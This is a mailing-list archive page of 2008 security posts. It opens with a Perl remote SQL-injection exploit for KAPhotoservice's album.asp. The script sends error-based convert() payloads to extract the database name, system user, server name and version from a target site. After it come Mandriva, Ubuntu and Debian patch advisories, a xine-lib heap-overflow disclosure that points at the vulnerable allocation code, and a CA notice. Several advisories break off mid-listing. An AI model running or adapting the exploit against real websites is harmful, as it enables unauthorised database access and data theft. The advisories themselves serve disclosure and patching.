KAPhotoservice (album.asp) Remote SQL Injection Exploit

2008-03-20 Thread sys-project
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]


[+] Info:


[~] Software: KAPhotoservice (Payment)

[~] Demo: http://www.kaphotoservice.com/photoservice/

[~] Exploit: Remote SQL Injection [High]

[~] Bug Found By: JosS

[~] Contact: sys-project[at]hotmail.com

[~] Web: http://www.spanish-hackers.com

[~] Vuln File: album.asp


[+] Exploit:


#!/usr/bin/perl


# KAPhotoservice - Remote SQL Injection Exploit

# Code by JosS

# Contact: sys-project[at]hotmail.com

# Spanish Hackers Team

# www.spanish-hackers.com


use IO::Socket::INET;

use LWP::UserAgent;

use HTTP::Request;

use LWP::Simple;


sub lw

{


my $SO = $^O;

my $linux = "";

if (index(lc($SO),"win")!=-1){

   $linux="0";

}else{

$linux="1";

}

if($linux){

system("clear");

}

else{

system("cls");

system ("title KAPhotoservice - Remote SQL Injection Exploit");

system ("color 02");

}


}


#*** expl **



&lw;


print "\t\t\n\n";

print "\t\t#KAPhotoservice - Remote SQL Injection Exploit #\n\n";

print "\t\t#by JosS   #\n\n";

print "\t\t\n\n";



$host=$ARGV[0];

chop $host;

$host=$host."/album.asp?cat=&apage=&albumid=";


if(!$ARGV[0]) {

print "\n[x] KAPhotoservice - Remote SQL Injection Exploit\n";

print "[x] written by JosS - sys-project[at]hotmail.com\n";

print "[x] usage: perl $0 [host]\n";

print "[x] example: http://host.com/PHPWebquest\n";;

exit(1);

 }


@comando=("1+and+1=convert(int,db_name())","1+and+1=convert(int,system_user)","1+and+1=convert(int,[EMAIL
 PROTECTED]@servername)--",'1+and+1=convert(int,@@version)--');



for ($i=0;$i<=3;$i++)


{


my $final = $host.$comando[$i];

my $ua = LWP::UserAgent->new;

my $req = HTTP::Request->new(GET => $final);

$doc = $ua->request($req)->as_string;


if ( $doc =~ /Syntax\s(.*)<\/font>/mosix )

{


if ($comando[$i] eq "1+and+1=convert(int,db_name())")

{


print "db_name:\n";


$dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);

print "$dbname\n\n";


}


if ($comando[$i] eq "1+and+1=convert(int,system_user)")


{


print "system_user:\n";


$systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);

print "$systemuser\n\n";


}


if ($comando[$i] eq "1+and+1=convert(int,[EMAIL PROTECTED]@servername)--")


{


print "servername:\n";


$servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);

print "$servername\n\n";


}


if ($comando[$i] eq '1+and+1=convert(int,@@version)--')


{


print "version:\n";


$version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm);

print "$version\n\n";


}


} # Cierre del if principal

} # cierre for



[ MDVSA-2008:073 ] - Updated perl-Net-DNS packages fix DoS vulnerability

2008-03-20 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:073
 http://www.mandriva.com/security/
 ___
 
 Package : perl-Net-DNS
 Date: March 20, 2008
 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A vulnerability in the Net::DNS perl module was found that could
 allow remote attackers to cause a denial of service via a crafted
 DNS response.
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6341
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 1cf2397dcfe207d625bd24d1d7fc744a  
2007.0/i586/perl-Net-DNS-0.58-1.2mdv2007.0.i586.rpm 
 434fdd9456118124117a26509c6d1674  
2007.0/SRPMS/perl-Net-DNS-0.58-1.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 374101d8c50675d8032c5695dfb0866f  
2007.0/x86_64/perl-Net-DNS-0.58-1.2mdv2007.0.x86_64.rpm 
 434fdd9456118124117a26509c6d1674  
2007.0/SRPMS/perl-Net-DNS-0.58-1.2mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 8ff35127ae1c20c0b4e4cf3734b41d78  
2007.1/i586/perl-Net-DNS-0.59-1.2mdv2007.1.i586.rpm 
 0630c817a581736750b3aa3a36330442  
2007.1/SRPMS/perl-Net-DNS-0.59-1.2mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 2db71882e00490ed228d3544e73d5dfa  
2007.1/x86_64/perl-Net-DNS-0.59-1.2mdv2007.1.x86_64.rpm 
 0630c817a581736750b3aa3a36330442  
2007.1/SRPMS/perl-Net-DNS-0.59-1.2mdv2007.1.src.rpm

 Mandriva Linux 2008.0:
 46454d0d2ffbccc32875d38428f5dbb7  
2008.0/i586/perl-Net-DNS-0.61-1.1mdv2008.0.i586.rpm 
 0dd436fba91470dbd4cc4a5371cfa909  
2008.0/SRPMS/perl-Net-DNS-0.61-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 3724958b2631242743be3d24ed463e5f  
2008.0/x86_64/perl-Net-DNS-0.61-1.1mdv2008.0.x86_64.rpm 
 0dd436fba91470dbd4cc4a5371cfa909  
2008.0/SRPMS/perl-Net-DNS-0.61-1.1mdv2008.0.src.rpm

 Corporate 3.0:
 34228478b5f31c0a2c9beb80de8a004b  
corporate/3.0/i586/perl-Net-DNS-0.39-2.2.C30mdk.i586.rpm 
 8846ab7ae3ecf66ee93666e4551e091b  
corporate/3.0/SRPMS/perl-Net-DNS-0.39-2.2.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 9d62397d900754063b46a1f6a7dcae9c  
corporate/3.0/x86_64/perl-Net-DNS-0.39-2.2.C30mdk.x86_64.rpm 
 8846ab7ae3ecf66ee93666e4551e091b  
corporate/3.0/SRPMS/perl-Net-DNS-0.39-2.2.C30mdk.src.rpm

 Corporate 4.0:
 57bb9572548a1727cdfde07176a55fc2  
corporate/4.0/i586/perl-Net-DNS-0.52-1.2.20060mlcs4.i586.rpm 
 cd1731f072ad841c1244b6e873226422  
corporate/4.0/SRPMS/perl-Net-DNS-0.52-1.2.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 454f468cd925c1fccdf20751ac884dd9  
corporate/4.0/x86_64/perl-Net-DNS-0.52-1.2.20060mlcs4.x86_64.rpm 
 cd1731f072ad841c1244b6e873226422  
corporate/4.0/SRPMS/perl-Net-DNS-0.52-1.2.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (GNU/Linux)

iD8DBQFH4p/ImqjQ0CJFipgRAjg7AJ94BiQLAcokF5ttd9yHBSDBtDE08ACgys4V
HlrGqAi2vzXL0Oc7eQ7AX2g=
=CA0R
-END PGP SIGNATURE-



[USN-589-1] unzip vulnerability

2008-03-20 Thread Kees Cook
=== 
Ubuntu Security Notice USN-589-1 March 20, 2008
unzip vulnerability
CVE-2008-0888
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  unzip   5.52-6ubuntu4.1

Ubuntu 6.10:
  unzip   5.52-8ubuntu1.1

Ubuntu 7.04:
  unzip   5.52-9ubuntu3.1

Ubuntu 7.10:
  unzip   5.52-10ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Tavis Ormandy discovered that unzip did not correctly clean up pointers.
If a user or automated service was tricked into processing a specially
crafted ZIP archive, a remote attacker could execute arbitrary code with
user privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-6ubuntu4.1.diff.gz
  Size/MD5:12788 c944a77823f756df4f6f1352028c51ba

http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-6ubuntu4.1.dsc
  Size/MD5:  535 05a4c713cd2bc201d7fec5dd0f1807ce
http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52.orig.tar.gz
  Size/MD5:  1140291 9d2391d6eac9217d1f41472034a9

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-6ubuntu4.1_amd64.deb
  Size/MD5:   161102 b975bb72efc3b8b8a7355011090a76d3

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-6ubuntu4.1_i386.deb
  Size/MD5:   147240 7470f2fa04517e0b5b601f69db54ac84

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-6ubuntu4.1_powerpc.deb
  Size/MD5:   165218 a6b0dc720809d80d31e809492056eee0

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-6ubuntu4.1_sparc.deb
  Size/MD5:   164078 552d2029d247f091442e174eae9c3a19

Updated packages for Ubuntu 6.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-8ubuntu1.1.diff.gz
  Size/MD5:12565 7c86995d3353555020b5072979437d32

http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-8ubuntu1.1.dsc
  Size/MD5:  535 942549c5fc2654810ecece441c702ed7
http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52.orig.tar.gz
  Size/MD5:  1140291 9d2391d6eac9217d1f41472034a9

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-8ubuntu1.1_amd64.deb
  Size/MD5:   164316 1fba1ee7c30fbd2572c49d55938eac54

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-8ubuntu1.1_i386.deb
  Size/MD5:   151466 20e48a45fad384a8310ce970c00903b2

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-8ubuntu1.1_powerpc.deb
  Size/MD5:   165248 c9f333ffc8b3ea28bd5882c6f683d200

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-8ubuntu1.1_sparc.deb
  Size/MD5:   163544 b9cf45c1b44e808e6f4bc28a0e462ba5

Updated packages for Ubuntu 7.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-9ubuntu3.1.diff.gz
  Size/MD5:91922 4ab4fa170cfb1009969476118e6c5ea0

http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-9ubuntu3.1.dsc
  Size/MD5:  619 721b61d3b81b58e01eab7e4d75ec0616
http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52.orig.tar.gz
  Size/MD5:  1140291 9d2391d6eac9217d1f41472034a9

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-9ubuntu3.1_amd64.deb
  Size/MD5:   167272 1b0f7e30281083c3c1f7ee7ea1edbff4

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-9ubuntu3.1_i386.deb
  Size/MD5:   154032 ab6718b23c1cff644082b0126a72a02e

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-9ubuntu3.1_powerpc.deb
  Size/MD5:   169850 b3cf955d0462608841b350435a049f4d

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_5.52-9ubuntu3.1_sparc.deb
  Size/MD5:   166698 4a8cfaa0a4f1eb5bd54649a8a770b9fd

Updated packages for Ubuntu 7.10:

  Source archives:


http

Multiple heap overflows in xine-lib 1.1.11

2008-03-20 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  xine-lib
  http://xinehq.de
Versions: <= 1.1.11
Platforms:Linux, *BSD, Solaris, Irix, MacOSX, Windows and others
Bugs: A] heap-overflow in demux_flv
  B] heap-overflow in demux_qt
  C] heap-overflow in demux_real
  D] heap-overflow in demux_wc3movie
  E] heap-overflow in ebml
  F] heap-overflow in demux_film
Exploitation: local
Date: 20 Mar 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


>From developers website:
"xine is a free (gpl-licensed) high-performance, portable and reusable
multimedia playback engine. xine itself is a shared library with an
easy to use, yet powerful API  which is used by many applications for
smooth video playback and video processing purposes."

The library and parts of its source code are widely used in many open
source players and projects.


###

===
2) Bugs
===


xine-lib is affected by various heap overflow vulnerabilities caused by
the wrong 32 bit calculation of the amount of memory to allocate for
some destination buffers and arrays.
These bugs allow an attacker to control some registers or directly the
code flow (like with demux_qt) which could leat to the execution of
malicious code.
For brevity will be showed directly the instructions in the source code
which do these bad allocations.


-
A] heap-overflow in demux_flv
-

>From src/demuxers/demux_flv.c:

static int parse_flv_var(demux_flv_t *this, 
 unsigned char *buf, int size, char *key, int keylen) {
  ...
  this->index = xine_xmalloc(num*sizeof(flv_index_entry_t));
  ...
  this->index = xine_xmalloc(num*sizeof(flv_index_entry_t));



B] heap-overflow in demux_qt


Practically almost any allocation instruction in
src/demuxers/demux_qt.c is vulnerable to various types of heap
overflows.


--
C] heap-overflow in demux_real
--

>From src/demuxers/demux_real.c:

static void real_parse_index(demux_real_t *this) {
...
*index = xine_xmalloc(entries * sizeof(real_index_entry_t));


--
D] heap-overflow in demux_wc3movie
--

>From src/demuxers/demux_wc3movie.c:

static int open_mve_file(demux_mve_t *this) {
  ...
  this->palettes = xine_xmalloc(this->number_of_shots * PALETTE_SIZE *
sizeof(palette_entry_t));

Note that the output buffer is filled using a special lookup table.



E] heap-overflow in ebml


>From src/demuxers/ebml.c:

int ebml_check_header(ebml_parser_t *ebml) {
...
char *text = malloc(elem.len + 1);


--
F] heap-overflow in demux_film
--

>From src/demuxers/demux_film.c:

static int open_film_file(demux_film_t *film) {
  ...
  film->sample_table =
xine_xmalloc(film->sample_count * sizeof(film_sample_t));


###

===
3) The Code
===


http://aluigi.org/poc/xinehof.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org


[ MDVSA-2008:072 ] - Updated kernel packages fix vulnerability

2008-03-20 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:072
 http://www.mandriva.com/security/
 ___
 
 Package : kernel
 Date: March 20, 2008
 Affected: Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 The Linux kernel prior to 2.6.22.17, when using certain drivers
 that register a fault handler that does not perform range checks,
 allowed local users to access kernel memory via an out-of-range offset
 (CVE-2008-0007).
 
 Additionally, this kernel fixes a JBD checkpoint memory leak bug.
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0007
 ___
 
 Updated Packages:
 
 Corporate 3.0:
 02a9abf32ab0acd35b367cef34d60e91  
corporate/3.0/i586/kernel-2.6.3.38mdk-1-1mdk.i586.rpm
 1926b9663ebce026d6ef0cc4b17c8900  
corporate/3.0/i586/kernel-BOOT-2.6.3.38mdk-1-1mdk.i586.rpm
 21affa41dca0a6545c75b45472d5508d  
corporate/3.0/i586/kernel-doc-2.6.3-38mdk.i586.rpm
 11a27b6746383fc05398d88819262a15  
corporate/3.0/i586/kernel-enterprise-2.6.3.38mdk-1-1mdk.i586.rpm
 d64c328410eabb26cb74fcc526c8078d  
corporate/3.0/i586/kernel-i686-up-4GB-2.6.3.38mdk-1-1mdk.i586.rpm
 c683085999e3e7e94fc219225dadc842  
corporate/3.0/i586/kernel-p3-smp-64GB-2.6.3.38mdk-1-1mdk.i586.rpm
 3ebbffdc4bc4931948d4b7fe49c44021  
corporate/3.0/i586/kernel-secure-2.6.3.38mdk-1-1mdk.i586.rpm
 6ce3bbd2c69db61e54a0903b42d64e8a  
corporate/3.0/i586/kernel-smp-2.6.3.38mdk-1-1mdk.i586.rpm
 cde3607985288c7286886bf8762850ea  
corporate/3.0/i586/kernel-source-2.6.3-38mdk.i586.rpm
 1262426cd7186f9a4e6e8e51d656776a  
corporate/3.0/i586/kernel-source-stripped-2.6.3-38mdk.i586.rpm 
 ec8008a027b33c8f07c561ac28451081  
corporate/3.0/SRPMS/kernel-2.6.3.38mdk-1-1mdk.src.rpm

 Corporate 3.0/X86_64:
 b0885f347038ab0f9e28f89cbcaf9abf  
corporate/3.0/x86_64/kernel-2.6.3.38mdk-1-1mdk.x86_64.rpm
 6c4779262b7f478ec5c7af9a6a0882cc  
corporate/3.0/x86_64/kernel-BOOT-2.6.3.38mdk-1-1mdk.x86_64.rpm
 b0e5f311e37553ccc779bc1c2699d6d8  
corporate/3.0/x86_64/kernel-doc-2.6.3-38mdk.x86_64.rpm
 cd4a1452a1b420e88792b23c9c63ddf6  
corporate/3.0/x86_64/kernel-secure-2.6.3.38mdk-1-1mdk.x86_64.rpm
 eb77a0239c0b8673d1027d897ba7261b  
corporate/3.0/x86_64/kernel-smp-2.6.3.38mdk-1-1mdk.x86_64.rpm
 424a83259a0a6f12426056230640d71f  
corporate/3.0/x86_64/kernel-source-2.6.3-38mdk.x86_64.rpm
 6ca7e51f1200272a1848310b2f9f54d5  
corporate/3.0/x86_64/kernel-source-stripped-2.6.3-38mdk.x86_64.rpm 
 ec8008a027b33c8f07c561ac28451081  
corporate/3.0/SRPMS/kernel-2.6.3.38mdk-1-1mdk.src.rpm

 Multi Network Firewall 2.0:
 cddca9d5e516af19ef235d575b964e7d  
mnf/2.0/i586/kernel-2.6.3.38mdk-1-1mdk.i586.rpm
 e283b1cd0a86ec26940561a93fa1f702  
mnf/2.0/i586/kernel-i686-up-4GB-2.6.3.38mdk-1-1mdk.i586.rpm
 d9ac1515cb52c4bb67f010fcc4b921c8  
mnf/2.0/i586/kernel-p3-smp-64GB-2.6.3.38mdk-1-1mdk.i586.rpm
 2d9f4e7b854c703701d9c8ec2e54029a  
mnf/2.0/i586/kernel-secure-2.6.3.38mdk-1-1mdk.i586.rpm
 5ed5914f0dee93412a8093ff9422a451  
mnf/2.0/i586/kernel-smp-2.6.3.38mdk-1-1mdk.i586.rpm 
 b0303437993328b249575c512a2177c3  
mnf/2.0/SRPMS/kernel-2.6.3.38mdk-1-1mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (GNU/Linux)

iD8DBQFH4nY7mqjQ0CJFipgRAgRiAKCW8WBx3XZaU+Q8CBfGoATEuv0v8QCfaSyr
Yp9yH/PEuFJhJufVylACR1s=
=HEjm
-END PGP SIGNATURE-



Note about recently publicized CA BrightStor ActiveX exploit code

2008-03-20 Thread Williams, James K

CA is reviewing exploit code that was posted on 2008-03-16 to the 
Milw0rm exploit archive web site.  This exploit code is 
potentially associated with vulnerabilities that may exist in CA 
BrightStor ARCserve Backup for Laptops and Desktops and/or related 
products.  CA will issue an advisory after we have completed our 
initial investigation.

Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research



[SECURITY] [DSA 1522-1] New xwine packages fix several vulnerabilities

2008-03-20 Thread Steve Kemp
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1526-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
March 20, 2008http://www.debian.org/security/faq
- 

Package: xwine
Vulnerability  : various
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2008-0930 CVE-2008-0931

Steve Kemp from the Debian Security Audit project discovered several local
vulnerabilities have been discovered in xwine, a graphical user interface
for the WINE emulator.

The Common Vulnerabilities and Exposures project identifies the following
problems:

CVE-2008-0930
  The xwine command makes unsafe use of local temporary files when
  printing.  This could allow the removal of arbitrary files belonging
  to users who invoke the program.

CVE-2008-0931
  The xwine command changes the permissions of the global WINE configuration
  file such that it is world-writable.  This could allow local users to edit
  it such that arbitrary commands could be executed whenever any local user
  executed a program under WINE.

For the stable distribution (etch), these problems have been fixed in version
1.0.1-1etch1.

We recommend that you upgrade your xwine package.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  
http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1.diff.gz
Size/MD5 checksum:27365 a7f1316789d0d54fbfdfbbbca8fb5c27
  http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1.dsc
Size/MD5 checksum:  619 477cc8074941df31e0d3c04c2d5ecf90
  http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1.orig.tar.gz
Size/MD5 checksum:  1527684 2748b66d5ab0b4cc172cbb296cc8363b

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_alpha.deb
Size/MD5 checksum:  1078778 f7f62194f4bcfcf08b3f24c2caad2cf0

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_amd64.deb
Size/MD5 checksum:  1044810 5a9c6db84637c399f53ac631685d359d

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_arm.deb
Size/MD5 checksum:  1042890 88b6f1cc95a3d1064be79c420535b70c

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_hppa.deb
Size/MD5 checksum:  1054266 9eb4ea73d3ea9eef16f9f8002e9b3d43

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_i386.deb
Size/MD5 checksum:  1049258 caf4aeb5e2a45b6c38abe8f5e0c7fb61

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_ia64.deb
Size/MD5 checksum:  1099784 a3a5facdb404d481df42ee386402b4fa

powerpc architecture (PowerPC)

  
http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_powerpc.deb
Size/MD5 checksum:  1045496 74235e48bda3cb5b43f589be5962c65f

s390 architecture (IBM S/390)

  
http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_s390.deb
Size/MD5 checksum:  1021898 374b7326c9092fba9d34eea4e3d69ce0

sparc architecture (Sun SPARC/UltraSPARC)

  
http://security.debian.org/pool/updates/main/x/xwine/xwine_1.0.1-1etch1_sparc.deb
Size/MD5 checksum:  1037724 32c6b9725b87a9f81074667290fab29b


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFH4rYOwM/Gs81MDZ0RAhM/AKClVPQIykIm2h9v/Te/vgF6Tb5RkgCgrWlL
kEKXH2c6/XFtM4lF0jSFrIM=
=Iknm
-END PGP SIGNATURE-



[USN-588-1] MySQL vulnerabilities

2008-03-20 Thread Jamie Strandboge
=== 
Ubuntu Security Notice USN-588-1 March 19, 2008
mysql-dfsg-5.0 vulnerabilities
CVE-2006-7232, CVE-2007-2692, CVE-2007-6303, CVE-2008-0226,
CVE-2008-0227
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  mysql-server-5.05.0.22-0ubuntu6.06.8

Ubuntu 6.10:
  mysql-server-5.05.0.24a-9ubuntu2.4

Ubuntu 7.04:
  mysql-server-5.05.0.38-0ubuntu1.4

Ubuntu 7.10:
  mysql-server-5.05.0.45-1ubuntu3.3

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Masaaki Hirose discovered that MySQL could be made to dereference
a NULL pointer. An authenticated user could cause a denial of service
(application crash) via an EXPLAIN SELECT FROM on the INFORMATION_SCHEMA
table. This issue only affects Ubuntu 6.06 and 6.10. (CVE-2006-7232)

Alexander Nozdrin discovered that MySQL did not restore database access
privileges when returning from SQL SECURITY INVOKER stored routines. An
authenticated user could exploit this to gain privileges. This issue
does not affect Ubuntu 7.10. (CVE-2007-2692)

Martin Friebe discovered that MySQL did not properly update the DEFINER
value of an altered view. An authenticated user could use CREATE SQL
SECURITY DEFINER VIEW and ALTER VIEW statements to gain privileges.
(CVE-2007-6303)

Luigi Auriemma discovered that yaSSL as included in MySQL did not
properly validate its input. A remote attacker could send crafted
requests and cause a denial of service or possibly execute arbitrary
code. This issue did not affect Ubuntu 6.06 in the default installation.
(CVE-2008-0226, CVE-2008-0227)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22-0ubuntu6.06.8.diff.gz
  Size/MD5:   154026 cd5be852f614715c69ac54ad2d908007

http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22-0ubuntu6.06.8.dsc
  Size/MD5: 1114 38d198b9bc8f33d842c2d357993c9f3f

http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22.orig.tar.gz
  Size/MD5: 18446645 2b8f36364373461190126817ec872031

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.22-0ubuntu6.06.8_all.deb
  Size/MD5:38436 8749eaaabf09f33d085c85994ff207a8

http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.22-0ubuntu6.06.8_all.deb
  Size/MD5:40978 fd1f742c531c1990eefc8f06028c343f

http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.22-0ubuntu6.06.8_all.deb
  Size/MD5:38440 a13b593991c0ff0112d045e4436aeb3f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.8_amd64.deb
  Size/MD5:  6727526 dd790f5dcbce8f9d2a459946298ee6f9

http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.8_amd64.deb
  Size/MD5:  1423360 e44952b82afd0b764cd4462d61510b2f

http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.8_amd64.deb
  Size/MD5:  6897080 6157f55dd2d66f5ce1ca3c6864f93ff6

http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.8_amd64.deb
  Size/MD5: 22492504 208ed17bc66d59499214fe923c73e429

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.8_i386.deb
  Size/MD5:  6141668 18fb4e3c6f0feb080cd9adf0a96c7c13

http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.8_i386.deb
  Size/MD5:  1383858 48190b45874e9a9923a00a9b6f89ac67

http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.8_i386.deb
  Size/MD5:  6279562 c5a4cf82a4bf174d1d857caccd9e01c0

http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.8_i386.deb
  Size/MD5: 21350958 03334dcddd8b546b631509c01f81bdc1

  powerpc architecture (Apple Macintosh G3/G4/G5):


